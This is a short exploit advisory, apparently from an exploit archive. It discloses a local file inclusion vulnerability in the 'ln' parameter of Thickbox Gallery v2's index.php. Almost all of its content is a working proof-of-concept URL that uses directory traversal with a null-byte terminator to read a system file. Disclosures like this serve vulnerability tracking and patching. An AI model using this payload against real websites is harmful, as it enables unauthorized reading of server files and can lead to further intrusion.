id: 5104
date: 04/26/2009
title: Thickbox Gallery v2 (index.php ln) Local File Inclusion Vulnerability
author: SirGod
cves: 

=====================================================================
Thickbox Gallery v2 (index.php ln) Local File Inclusion Vulnerability
=====================================================================


##########################################################################################
[+] Thickbox Gallery v2 Local File Inclusion Vulnerability
[+] Discovered By SirGod
##########################################################################################

[+] Local File Inclusion

   PoC :
    http://127.0.0.1/[path]/index.php?ln=../../../../../../BOOTSECT.BAK%00

##########################################################################################


#  0day.today [2023-03-23]  #